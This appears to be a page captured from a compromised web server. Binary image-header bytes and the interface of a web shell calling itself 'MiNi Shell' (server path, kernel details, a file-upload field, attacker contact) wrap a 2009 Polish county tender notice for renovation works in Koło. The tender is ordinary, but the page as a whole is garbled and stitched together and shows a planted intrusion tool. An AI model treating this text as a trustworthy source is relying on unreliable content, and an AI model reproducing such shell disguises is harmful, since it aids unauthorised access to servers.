JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090304/49990-N-2009.html

<p class="kh_header"><b>Koło: WYKONANIE ROBÓT BUDOWLANYCH ZWIĄZANYCH Z REMONTEM KORYTARZA, PIWNICY, MALOWANIEM POMIESZCZEŃ BIUROWYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 21/23 ORAZ REMONT POMIESZCZEŃ SANITARNYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 27  STAROSTWA POWIATOWEGO W KOLE  W RAMACH NASTĘPUJĄCYCH ODDZIELNYCH ZADAŃ:

1) ZADANIE NR 1 - REMONT KORYTARZA, PIWNICY ORAZ MALOWANIE POMIESZCZEŃ BIUROWYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 21/23 STAROSTWA POWIATOWEGO W KOLE,
2) ZADANIE NR 2  -  REMONT POMIESZCZEŃ SANITARNYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 27 STAROSTWA POWIATOWEGO W KOLE.</b><br>
<b>Numer ogłoszenia: 49990 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Kole , ul. Sienkiewicza 21/23, 62-600 Koło, woj. wielkopolskie, tel. 063 2617835, faks 063 2725825.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www. starostwokolskie.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANYCH ZWIĄZANYCH Z REMONTEM KORYTARZA, PIWNICY, MALOWANIEM POMIESZCZEŃ BIUROWYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 21/23 ORAZ REMONT POMIESZCZEŃ SANITARNYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 27  STAROSTWA POWIATOWEGO W KOLE  W RAMACH NASTĘPUJĄCYCH ODDZIELNYCH ZADAŃ:

1) ZADANIE NR 1 - REMONT KORYTARZA, PIWNICY ORAZ MALOWANIE POMIESZCZEŃ BIUROWYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 21/23 STAROSTWA POWIATOWEGO W KOLE,
2) ZADANIE NR 2  -  REMONT POMIESZCZEŃ SANITARNYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 27 STAROSTWA POWIATOWEGO W KOLE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie robót budowlanych związanych z remontem korytarza, piwnicy, malowaniem pomieszczeń biurowych w budynku przy ulicy Sienkiewicza 21/23 oraz remont pomieszczeń sanitarnych w budynku przy ulicy Sienkiewicza 27 Starostwa Powiatowego w Kole w ramach dwóch oddzielnych zadań:

1) Zadanie Nr 1, którego zakres rzeczowy obejmuje wykonanie następujących robót budowlanych: 
1) remont korytarza:

a) wykucie z muru i osadzenie nowych drzwiczek skrzynki rozdzielczej elektrycznej i  skrzynki hydrantowej,
b) wykucie z muru ościeżnic drewnianych, gablot informacyjnych, wykucie bruzd    dla przewodów,
c) zerwanie posadzki, cokolików,
d) gruntowanie podłoży preparatami,
e) montaż listew progowych,
f) demontaż grzejnika żeliwnego,
g) zeskrobanie i zmycie starej farby z powierzchni ścian,
h) spoinowanie luksferów,
i) zabudowa drzwi,
j) gładzie gipsowe,
k)  malowanie farbą akrylową,
l) demontaż opraw oświetleniowych i montaż nowych.

2) roboty malarskie i remontowe pomieszczeń biurowych:

a) zeskrobanie i zmycie starej farby,
b) obudowa istniejących przewodów i rur,
c) wykonanie tynków uzupełniających,
d) gruntowanie podłoży,
e) malowanie sufitów i ścian,
f) demontaż i montaż grzejników,
g)  malowanie rur,
h) wymiana kratek wentylacyjnych, 
i) likwidacja karnisza,
j) demontaż korytek kablowych.

3) piwnica:

a) wykucie z muru ościeżnic drewnianych,
b) rozebranie ścianki z cegieł,
c) wykonanie tynku zwykłego,
d) zerwanie posadzki,
e) regulacja pionowa studzienek piwnicznych
f) gruntowanie podłoży,
g) położenie posadzki płytkowej,
h) uzupełnienie cokolików cementowych,
i) zeskrobanie i zmycie starej farby,
j) malowanie.

2) Zadanie Nr 2, które obejmuje remont sanitariatów w następującym zakresie: 

a) wykucie z muru ościeżnic drewnianych,
b) rozebranie ścianek  kabin wraz z drzwiami,
c) rozebranie wykładziny ściennej z płytek,
d) demontaż termy elektrycznej, umywalki, ustępu z miską fajansową, pisuaru, rurociągu, grzejnika żeliwnego,
e) wykonanie przesklepień otworów w ścianach z cegieł z wykuciem bruzd dla belek,
f) rozebranie ścian z cegieł, 
g) zeskrobanie i zmycie starej farby,
h) gruntowanie podłoży,
i) montaż rurociągów i ich izolacja,
j) wymiana kratki ściekowej,
k)  posadzki z płytek z kamieni sztucznych antypoślizgowych,
l) licowanie ścian płytkami,
m) malowanie,
n) wykonanie i montaż zabudowy meblowej,
o)  montaż umywalek i baterii. 

Szczegółowa charakterystyka, zakres oraz ilość robót budowlanych do wykonania został opisany w przedmiarach robót, drukach TABELE oraz specyfikacji technicznej wykonaniai odbioru robót załączonych do SIWZ.
Szczegółowe warunki realizacji zamówienia określone zostały w druku PROJEKT UMOWY..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia, określonego w rozdziale II SIWZ mogą ubiegać się Wykonawcy, którzy spełniają następujące wymagania:

1) spełniają warunki udziału w postępowaniu określone w art. 44 i art. 22 ust. 1 Ustawy oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 Ustawy,
2) posiadają doświadczenie zawodowe w charakterze Generalnego Wykonawcy wyrażające się  w zrealizowaniu co na najmniej 3 robót budowlanych polegających na budowie, przebudowie lub remoncie budynków użyteczności  w okresie ostatnich  5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, o wartości minimum 20.000,00 zł netto każda,
3) dysponują kierownikiem budowy (może być ten sam kierownik dla wszystkich zdań), który posiada uprawnienia budowlane w specjalności niezbędnej do kierowania robotami budowlanymi objętymi przedmiotem zamówienia publicznego, 
4) roboty budowlane objęte zamówieniem publicznym wykonają sami lub z udziałem podwykonawców w zakresie określonym w ofercie,
5) przy ocenie spełnienia przez Wykonawców warunków określonych w rozdziale VI ust. 1 pkt 2 SIWZ, nie będzie uwzględniane doświadczenie podwykonawców,
6) udzielą co najmniej 36 miesięcy gwarancji na wykonane roboty budowlane    oraz gwarancji producentów na zastosowane materiały i urządzenia, licząc od dnia protokólarnego odbioru całości robót objętych przedmiotem zamówienia.

Na potwierdzenie spełnienia warunków określonych w ust. 1 Wykonawcy załączą  do oferty następujące oświadczenia i dokumenty:

1) oświadczenie, że spełnia warunki udziału określone w art. 44 i art. 22 ust. 1      Ustawy oraz nie podlega wykluczeniu z przedmiotowego postępowania na podstawie art. 24 Ustawy, zgodnie z Załącznikiem Nr 1,

2) wykaz robót budowlanych zrealizowanych w charakterze Generalnego Wykonawcy polegających na budowie, przebudowie lub remoncie budynków użyteczności publicznej w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego - na Załączniku Nr 2 wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane z należytą starannością (referencje, faktury, umowy wraz  z protokółami odbioru końcowego - według uznania Wykonawcy),
3) informację na temat kierownika budowy odpowiedzialnego za realizację robót budowlanych objętych przedmiotem zamówienia publicznego w zakresie określonym w rozdziale VI ust. 1 pkt 2 SIWZ - na Załączniku Nr 3 wraz z udokumentowaniem jego kwalifikacji zawodowych (aktualne uprawnienia budowlane, zaświadczenia potwierdzające wpis na listę właściwej izby samorządu zawodowego),
4) zakres rzeczowy oraz wartość robót budowlanych, które zostaną wykonane     przy udziale podwykonawców (jeżeli Wykonawca przewiduje wykorzystanie podwykonawców), z zachowaniem zapisu rozdziału VI ust. 1 pkt 4 i 5 SIWZ - na Załączniku Nr 4,
5) zobowiązanie o gotowości współpracy w przypadku udostępnienia przez inny podmiot, osób uprawnionych do kierowania robotami budowlanymi objętymi przedmiotem zamówienia publicznego, zgodnie z podpisanym oświadczeniem,  który stanowi Załącznikiem Nr 5..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca ubiegający się o zamówienie publiczne musi załączyć do oferty następujące dokumenty potwierdzające, że oferta jest ważna i nie podlega odrzuceniu:

1) wypełniony druk OFERTA, 
2) kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej wraz z założeniami wyjściowymi do kosztorysowania lub protokółem danych wyjściowych   do kosztorysowania, które Wykonawca zastosował do obliczenia ceny oferty w kosztorysie ofertowym - oddzielnie dla każdego zadania składającego się na przedmiot zamówienia, 
3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu       do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
4) inne niezbędne oświadczenia i dokumenty określone w rozdziale VI ust. 2 SIWZ,
5) pełnomocnictwo do podpisania oferty, o ile nie wynika z innych dokumentów załączonych do oferty, jeżeli jest wymagane,
6) pełnomocnictwo do składania oferty łącznej w zakresie określonym w art. 23 ust. 2 Ustawy, jeżeli jest wymagane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www. starostwokolskie.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe ul. Sienkiewicza 21/23 62-600 Koło, pok. nr 304A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 10:00, miejsce: Ofertę należy złożyć w Starostwie Powiatowym w Kole  przy ul. Sienkiewicza 21/23, pokój nr 205.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> REMONT KORYTARZA, PIWNICY ORAZ MALOWANIE POMIESZCZEŃ BIUROWYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 21/23 STAROSTWA POWIATOWEGO W KOLE.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> REMONT POMIESZCZEŃ SANITARNYCH W BUDYNKU PRZY ULICY SIENKIEWICZA 27 STAROSTWA POWIATOWEGO W KOLE.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com